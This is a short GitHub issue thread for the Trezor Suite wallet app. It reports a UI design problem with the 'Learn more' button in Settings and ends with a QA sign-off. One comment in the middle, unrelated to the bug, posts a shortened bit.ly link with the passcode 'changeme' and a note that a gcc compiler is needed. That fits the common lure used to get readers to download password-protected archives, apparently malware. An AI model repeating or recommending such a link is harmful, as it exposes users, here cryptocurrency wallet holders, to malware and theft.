### ISSUE TITLE
Learn more button in Settings section unexpected design

### ISSUE THREAD

**Issue by bosomt** [trezor/trezor-suite#14155]
**Describe the bug**
`Learn more` button in `Settings` section unexpected design

**Steps to reproduce:**
1. Navigate to Settings section and observe sections with learn more button

**Info:**
 - Suite version: web 24.10.0 (5f021c81121297dd3c008afecc4c1818db06575a)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.0 regular (revision dd4671a5104952ef505d28d1f9e94d1484b4607a)
 - Transport: BridgeTransport 2.0.33

**Screenshots:**
![image](https://github.com/user-attachments/assets/369291df-2d23-4041-9fd6-aa62c38795b5)

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by bosomt** [comment]
**QA OK**

**Info:**
 - Suite version: web 24.10.0 (d916c7a64294e28941c72deda3717220d118540b)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
 - OS: MacIntel
 - Screen: 1512x982
